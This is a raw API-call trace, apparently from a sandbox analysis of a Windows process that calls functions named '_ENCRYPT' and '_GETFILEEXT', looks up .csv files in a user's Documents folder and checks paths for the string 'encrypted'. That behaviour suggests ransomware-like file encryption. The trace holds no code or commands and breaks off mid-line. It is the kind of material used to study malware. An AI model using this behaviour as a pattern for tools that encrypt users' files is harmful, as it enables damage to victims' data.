dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.379] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0036.379] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.380] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.381] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbf8 [0036.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cbf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.381] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0036.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.381] CloseHandle (hObject=0x128) returned 1 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.381] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.382] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.382] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.382] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.382] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.382] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.382] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.383] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.383] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.383] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.383] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447c1820, ftCreationTime.dwHighDateTime=0x1d5bfca, ftLastAccessTime.dwLowDateTime=0x8ed2db60, ftLastAccessTime.dwHighDateTime=0x1d5c19c, ftLastWriteTime.dwLowDateTime=0x8ed2db60, ftLastWriteTime.dwHighDateTime=0x1d5c19c, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x0, dwReserved1=0x777648, cFileName="PM4N5-.csv", cAlternateFileName="")) returned 0x7c20c0 [0036.383] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.383] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.383] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447c1820, ftCreationTime.dwHighDateTime=0x1d5bfca, ftLastAccessTime.dwLowDateTime=0x8ed2db60, ftLastAccessTime.dwHighDateTime=0x1d5c19c, ftLastWriteTime.dwLowDateTime=0x8ed2db60, ftLastWriteTime.dwHighDateTime=0x1d5c19c, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x0, dwReserved1=0x777648, cFileName="PM4N5-.csv", cAlternateFileName="")) returned 0x7c20c0 [0036.383] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.383] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\PM4N5-.csv\"", 